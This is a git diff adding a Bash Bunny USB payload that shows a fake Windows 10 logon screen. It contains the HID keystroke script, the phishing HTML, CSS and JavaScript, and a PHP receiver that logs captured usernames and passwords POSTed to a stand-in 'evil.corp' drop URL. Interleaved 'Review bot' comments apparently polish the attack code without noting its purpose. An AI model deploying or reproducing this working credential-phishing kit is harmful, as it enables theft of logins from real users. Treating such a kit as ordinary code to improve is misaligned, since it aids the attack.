Merge branch 'hak5:master' into master
|
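--- /dev/null
+++ b/<PATH_NOT_SHOWN_1>
@@ -0,0 +1,66 @@
+# "Microsoft Windows 10" Fake Logon Screen
+
+- Title: "Microsoft Windows 10" Fake Logon Screen
+- Author: TW-D
+- Version: 1.0
+- Target: Microsoft Windows 10
+- Category: Phishing
+
+## Description
+
+1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+3) Retrieve the current username.
+4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
+5) The "Bash Bunny" can be removed because the files are cached in the web browser.
+6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+readonly INPUT_PLACEHOLDER="Password"
+
+
+```
+
+Example of code for the data receiver :
+```php
+<?php
+
+if (
+$_SERVER['REQUEST_METHOD'] === 'POST' &&
+isset($_POST['username']) && !empty($_POST['username']) &&
+isset($_POST['password']) && !empty($_POST['password'])
+) {
+
+$remote_addr = (string) $_SERVER['REMOTE_ADDR'];
+$user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
+$username = (string) $_POST['username'];
+$password = (string) $_POST['password'];
+
+/*
+touch ./aGFrNQ_loot.log
+chown www-data:www-data ./aGFrNQ_loot.log
+*/
+$loot = fopen('aGFrNQ_loot.log', 'a');
+fwrite($loot, "##\n");
+fwrite($loot, $remote_addr . "\n");
+fwrite($loot, $user_agent . "\n");
+fwrite($loot, $username . ':' . $password . "\n");
+fwrite($loot, "##\n");
+fclose($loot);
+
+}
+
+http_response_code(302);
+header('Location: https://hak5.org/');
+exit;
+
+?>
+```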
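--- /dev/null
+++ b/<PATH_NOT_SHOWN_2>
@@ -0,0 +1,121 @@
+#!/bin/bash
+#
+# Title: "Microsoft Windows 10" Fake Logon Screen
+#
+# Description:
+# 1) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+# 2) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+# 3) Retrieve the current username.
+# 4) Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
+# 5) The "Bash Bunny" can be removed because the files are cached in the web browser.
+# 6) The password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Phishing
+# Target: Microsoft Windows 10
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# NOTE
+# ===============
+# Target computer with a single screen.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+readonly INPUT_PLACEHOLDER="Password"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 8000
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 8000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3500
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+# Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#
+Q STRING "(powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)"
+Q ENTER
+Q DELAY 1500
+
+# Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#
+Q STRING "(powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)"
+Q ENTER
+Q DELAY 1500
+
+# Retrieve the current username.
+#
+Q STRING "\"const CURRENT_USERNAME = '\$([Environment]::UserName)';\" | Out-File -FilePath ./TMP.js"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "\"const DROP_URL = '${DROP_URL}';\" | Out-File -FilePath ./TMP.js -Append"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "\"const INPUT_PLACEHOLDER = '${INPUT_PLACEHOLDER}';\" | Out-File -FilePath ./TMP.js -Append"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+# Full-screen opening of the phishing HTML page using the default web browser with a random wallpaper.
+#
+Q STRING "(Invoke-Expression .\\phishing_files\\index.html); exit"
+Q ENTER
+Q DELAY 9000
+Q TAB
+Q DELAY 2000
+Q ENTER
+Q DELAY 2000
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+# The "Bash Bunny" can be removed because the files are cached in the web browser.
+#
+shutdown -h 0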
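Review bot: The two `powercfg /Change ... 0` commands in STAGE3 are never reverted; the CLEANUP stage runs only `sync`, so the target keeps its monitor and standby timeouts disabled after the payload finishes, and neither the header comment nor the Description list says so. Add a line under the STAGE3 comment, e.g. `# NOTE: these powercfg changes persist on the target; CLEANUP does not restore the previous values.`, and mirror it in the header's Description so the side effect is documented where the constants are configured. The same applies to the `TMP.js` file created with `Out-File`, which is written to the volume and not mentioned in the header either.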
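--- /dev/null
+++ b/<PATH_NOT_SHOWN_3>
@@ -0,0 +1,16 @@
+body {
+min-height: 100vh;
+background-size: cover;
+background-repeat: no-repeat;
+background-position-x: center;
+background-position-y: center;
+}
+
+.login {
+min-width: 42px;
+background-image: url("./../img/submit.png");
+background-size: cover;
+background-repeat: no-repeat;
+background-position-x: center;
+background-position-y: center;
+}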
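--- /dev/null
+++ b/<PATH_NOT_SHOWN_4>
@@ -0,0 +1,13 @@
+@font-face {
+font-family: "text-security-disc";
+src: url("./../font/text-security-disc.ttf") format("truetype");
+}
+
+body, .password::placeholder {
+font-family: "Segoe UI";
+font-weight: lighter;
+}
+
+.password {
+font-family: "text-security-disc";
+}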
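--- /dev/null
+++ b/<PATH_NOT_SHOWN_5>
@@ -0,0 +1,4 @@
+document.querySelector('div#username').innerText = CURRENT_USERNAME;
+document.querySelector('#drop').action = DROP_URL;
+document.querySelector('input#username').value = CURRENT_USERNAME;
+document.querySelector('.password').placeholder = INPUT_PLACEHOLDER;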
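--- /dev/null
+++ b/<PATH_NOT_SHOWN_6>
@@ -0,0 +1,9 @@
+function fullscreen() {
+let document_element;
+document_element = document.documentElement;
+document.querySelector('#fullscreen').style.display = "none";
+if (document_element.requestFullscreen) {
+document_element.requestFullscreen();
+document.querySelector('.password').focus();
+}
+}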
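--- /dev/null
+++ b/<PATH_NOT_SHOWN_7>
@@ -0,0 +1,9 @@
+const WALLPAPERS = [
+'abstact-nature.jpg',
+'beach-cave.jpg',
+'mountains-lake.png',
+'sea-airplain.png',
+'solid-blue.jpg',
+'windows-light.jpg'
+];
+document.querySelector('body').style.backgroundImage = ('url("./assets/img/wallpapers/' + (WALLPAPERS.sort(() => Math.random() - 0.5)[0]) + '")');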
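Review bot: `WALLPAPERS.sort(() => Math.random() - 0.5)` on the last line is not a uniform shuffle — a comparator that is not consistent gives engine-dependent, biased orderings — and it reorders the `const` array in place only to read its first element. Indexing directly is correct and clearer: `const WALLPAPER = WALLPAPERS[Math.floor(Math.random() * WALLPAPERS.length)];` followed by `document.querySelector('body').style.backgroundImage = 'url("./assets/img/wallpapers/' + WALLPAPER + '")';`. A one-line comment above the array naming the directory the entries are resolved against would also help, since the path is only visible in the final expression.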
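--- /dev/null
+++ b/<PATH_NOT_SHOWN_8>
@@ -0,0 +1,7 @@
+window.addEventListener(
+'contextmenu',
+function(e) {
+e.preventDefault();
+},
+false
+);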
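--- /dev/null
+++ b/<PATH_NOT_SHOWN_9>
@@ -0,0 +1,47 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8" />
+<meta name="viewport" content="width=device-width, initial-scale=1" />
+<link rel="stylesheet" type="text/css" href="./assets/css/backgrounds.css?v=1.0.0" />
+<link rel="stylesheet" type="text/css" href="./assets/css/fonts.css?v=1.0.0" />
+<link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?v=5.1.3" />
+<title></title>
+</head>
+<body>
+<main class="container-fluid">
+<section class="row">
+<div class="col-3" style="min-height: 100vh;">
+<button id="fullscreen" onclick="fullscreen();">fullscreen</button>
+</div>
+<div class="col-6 align-self-center text-center">
+<img class="img-fluid opacity-75" src="./assets/img/user.png" title="" />
+<div class="h2 my-3 text-white" id="username">User</div>
+<div class="row">
+<div class="col-6 offset-3">
+<form method="POST" id="drop">
+<div class="input-group">
+<input class="d-none" id="username" type="text" name="username" />
+<input class="form-control password" type="text" name="password" autocomplete="off" placeholder="Password" required />
+<button class="btn opacity-75 login" type="submit"></button>
+</div>
+</form>
+</div>
+</div>
+</div>
+<div class="col-3" style="min-height: 100vh;">
+<div class="position-absolute bottom-0 end-0">
+<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/worldwide.png" title="" />
+<img class="img-fluid mx-2 my-3" style="width: 45px;" src="./assets/img/icons/network.png" title="" />
+<img class="img-fluid ms-2 me-3 my-3" style="width: 45px;" src="./assets/img/icons/power.png" title="" />
+</div>
+</div>
+</section>
+</main>
+<script type="text/javascript" src="./../TMP.js"></script>
+<script type="text/javascript" src="./assets/js/fullscreen.js?v=1.0.0"></script>
+<script type="text/javascript" src="./assets/js/rightclick.js?v=1.0.0"></script>
+<script type="text/javascript" src="./assets/js/randomwall.js?v=1.0.0"></script>
+<script type="text/javascript" src="./assets/js/dispatch.js?v=1.0.0"></script>
+</body>
+</html>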
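Review bot: `id="username"` appears twice in the new markup, on the `<div class="h2 ...">` and on the hidden `<input>` inside the form; HTML requires ids to be unique, and the four-line script that fills them only works because it qualifies its selectors with the element name (`div#username`, `input#username`). Rename the input, e.g. `<input class="d-none" id="username-field" type="text" name="username" />`, and change that script's selector to match. The page also depends on `./../TMP.js` being generated before it is opened; a comment next to that `<script>` tag naming which constants it is expected to define (`CURRENT_USERNAME`, `DROP_URL`, `INPUT_PLACEHOLDER`) would make the dependency visible, as would filling the empty `<title></title>`.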
@ -6,7 +6,7 @@
|
|||
# Target: Windows 7
|
||||
# Attackmodes: HID
|
||||
|
||||
ATTACMODE HID
|
||||
ATTACKMODE HID
|
||||
|
||||
###### OPTIONS #######
|
||||
|
||||
|
|